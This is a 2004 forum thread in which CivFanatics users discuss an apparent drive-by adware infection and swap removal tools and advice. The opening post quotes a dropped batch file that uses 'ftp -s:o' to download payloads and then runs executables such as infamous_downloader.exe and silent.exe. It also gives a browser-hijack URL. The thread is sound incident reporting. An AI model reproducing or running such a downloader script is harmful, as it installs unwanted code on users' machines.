1. We have added a Gift Upgrades feature that allows you to gift an account upgrade to another member, just in time for the holiday season. You can see the gift option when going to the Account Upgrades screen, or on any user profile screen.
    Dismiss Notice

Foistware from CFC?

Discussion in 'Site Feedback' started by scoutsout, May 20, 2004.

  1. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    Last night this was the only site I logged onto - therefore, I believe the things that were foisted onto my machine came from, or through, this site. I left the connection on when I went to bed. At some point the connection was dropped (thanks for small favors).

    After closing down some "risque" browser windows, I re-booted. After the machine came back up, the "dial-up dialog" immediately popped up. Hmmm... something is trying to "phone home".

    I found the following modifications to my system:

    Running processes
    loader
    id53
    pef

    New desktop Icons:

    Lycos Sidesearch
    appears to be a browser hijack

    0021-bdl94126.exe
    No information given in "properties", but icon was a "setup" icon.

    CS4P20.exe
    Company Name: Clear Search
    Product Name: Loader

    "o"
    No information given in "properties"

    "o.bat"
    Commands as follows:

    if not exist C:\WINDOWSstatuslog ftp -s:o
    if exist install2.exe install2.exe
    if exist infamous_downloader.exe infamous_downloader.exe
    if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
    if exist CS4P028.exe CS4P028.exe
    if exist silent.exe silent.exe

    "infamous_downloader.exe",
    No information given in "properties"

    install2.exe
    Company Name: TODO
    Product Name: Spawner.exe

    silent.exe
    No information given in "properties"

    New folder under c: "installer", with "id53.exe" in it
    New folder under c: "temporary", with stcterms.html in it

    New Windows Startup Items:
    PowerReg Scheduler.exe
    PowerRegSchedulerV3.exe

    In c:\windows
    "infamous.exe"

    In the program files directory
    New Folder "Lycos"
    New programs "over.exe" and "pup.exe"

    After cleaning all of this crap out, starting internet explorer, my browser was hijacked to the following:

    http://default-homepage-network.com/start.cgi?hkcu

    This morning I see we now have popup windows on the forums side of CFC. That really is too bad.
     
  2. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    Would somebody please verify if the company propagating this popup is popping it up through CFC Forums? I mean, come on people, my wife thinks American Photographer is porn. I really don't need stuff like this when I'm trying to read a turnlog:

     
  3. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    You've probably got it from somewhere else if its popping up whilst actually browsing the forum since you should only get adverts on the mainpage.
     
  4. Knight-Dragon

    Knight-Dragon Unhidden Dragon Retired Moderator

    Joined:
    Jun 25, 2001
    Messages:
    19,963
    Location:
    Singapore
    We, at CFC, don't condone this. TF will surely raise a complaint with our site host, and ask them to remove it (if it's fr here) - since we're a family friendly site.
     
  5. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    @XIII: Thank you. I can't ask any more than for someone in the know to check it out.

    @Dell19: at the time that thing popped up, there were no suspicious processes running (Explorer, systray, rnapp, and one MSIE window, nothing else) and I was on CFC forums, reading a turnlog. I'm 99% sure I got rid of everything that was foisted. I have "forums.civfanatics.com" bookmarked, and that's usually the way I enter this site... because the main page has popups. All I can do is describe what I see going on...
     
  6. MarineCorps

    MarineCorps Explosion!

    Joined:
    Jun 26, 2003
    Messages:
    8,187
    Gender:
    Male
    Location:
    Cape Cod
    I just scanned my computer and all I found were a bunch of tracking cookies. But on s semi different note no Red Serrif..... :confused:
     
  7. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    I also should have mentioned - AdAware caught NONE of this stuff. Also - when I closed my browser earlier, I got a popup. I see three possibilities (someone please tell me if they see another):

    1) Something still has my browser 'hooked' after the foistware routine.
    2) there's a TSR process running that's invisible to the task manager
    3) There's something in the scripts/code that make up the pages of the forums.

    Believe it or not, I'm hoping it's #1.
     
  8. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    Have you tried updating adaware to get the latest updates?
     
  9. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    Okay - the forums side seems to be behaving nicely from work... so that eliminates #3. I'm still fairly certain that the foistware came from a popup window off the main site (I surfed it a little last night too...) but at least the problem seems to be somewhat isolated.

    @Dell - thanks for your interest/concern/help/advice... I appreciate it. I'll check back in here after I spend some time on my machine this eveining.
     
  10. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    I have to have something to do to distract me from revising...
     
  11. eyrei

    eyrei Deity Retired Moderator

    Joined:
    Nov 1, 2001
    Messages:
    9,162
    Location:
    Cary, NC USA
    When was the last time you rebooted before you visited CFC? Often, software like that doesn't start functioning until the computer reboots, as the instructions to install and run the programs is in the registry and autoexec files. There is some spyware that you might get from CFC, but none of it seems malignant like you are describing.
     
  12. RoddyVR

    RoddyVR Veteran Board NESer

    Joined:
    Mar 29, 2002
    Messages:
    4,210
    Location:
    Russian in US
    scoutsout,

    i had the same thing a while back (popups from out of nowwhere and other evilness). was sure it was CFC that was doing it. ran a couple of the ADaware and the like scanners. they cleaned off a couple things, but it was still happening.
    SpyBot S&D found 3 more though, and after that it all stopped.

    it seems to me that all these scanning/cleaning softwares dont have ALL the spyware/adware progs listed in them, so they dont always catch everything. try DLing another cleaner (spybot seems to be a good free one for me).

    the fact that its comming up during CFC browsing doesnt realy mean anything.
    if you want to run a clean test, try rebooting your machine then going to like MSN.com or CNN or something and leaving it there overnight, see if the popups come around again. if they do, its not cfc, its another adware/spyware on your system that your cleaner software didnt find and doesnt know about (you have updated it right?)
     
  13. eyrei

    eyrei Deity Retired Moderator

    Joined:
    Nov 1, 2001
    Messages:
    9,162
    Location:
    Cary, NC USA
    Download hijackthis from that site. There forum also has some very useful information.
     
  14. Paalikles

    Paalikles Emperor

    Joined:
    Nov 28, 2001
    Messages:
    1,536
    Some spyware...that's an understatement :lol:

    My advice:

    www.spybot.info <-- Spybot Search and Destroy
    combined with adaware (remember to configure adaware to do a deepscan + search compressed archives)
    www.trendmicro - use housecall if you dont have your own virus scanner. I use Trendmicro's internet security, which also detects malware and spyware - so I reckon their free tool Housecall will also do that.

    Configure IE to ask you before accepting cookies - that may not do much, but afaik it provides at least some benefit.
    http://www.javacoolsoftware.com/spywareblaster.html is another good tool to combat spyware
    also try the spywareguard from the same company (check under the download section)

    Also - remember that some malware is more harmless than others: I recently removed a trojan from a friend's computer "small.5" which does not deliver a destructive payload, but hangs the computer. I removed the running process, and manually deleted the program - then the machine showed no infections ;)
     
  15. Civrules

    Civrules We the People

    Joined:
    Apr 6, 2003
    Messages:
    5,621
    Gender:
    Male
    Location:
    US
  16. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
  17. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    Probably although they may not all be exactly the same problem as only a few posters seem to suffer from this.
     
  18. scoutsout

    scoutsout Minstrel Boy

    Joined:
    Dec 29, 2002
    Messages:
    4,263
    Location:
    Check Six!
    At the risk of sounding argumentative, we know that only a few posters are posting about this. We don't know that only a few posters are suffering from this. Two similar threads started on the same day sounds a little suspicious to me.

    And I just remembered that this machine I'm on now has a different OS and some different software that makes it a little harder for me to have foistware downloaded to this machine without my explicit consent.

    @Roddy (and others) Got Spybot. Thanks!
     
  19. Dell19

    Dell19 Take a break

    Joined:
    Dec 5, 2000
    Messages:
    16,231
    Location:
    London
    You might be correct but two is only one more than one so both possibilities have a reasonable chance of being correct at the moment. Another thing that might be helping me is that I am behind a university firewall.
     
  20. shirleyrocks

    shirleyrocks Prince

    Joined:
    Oct 29, 2001
    Messages:
    441
    Location:
    Chicago
    Well, how about three people then? This afternoon, just as I was entering the CFC website, my anti-virus software popped up with an alert notification. Something along these lines (from my logfile)...

    Action: File Deleted
    Infection: HTML.MHTMLRedir.Exploit
    Infection Type: Trojan

    I think Thunderfall's host is feeding him some bad pop-ups.
     

Share This Page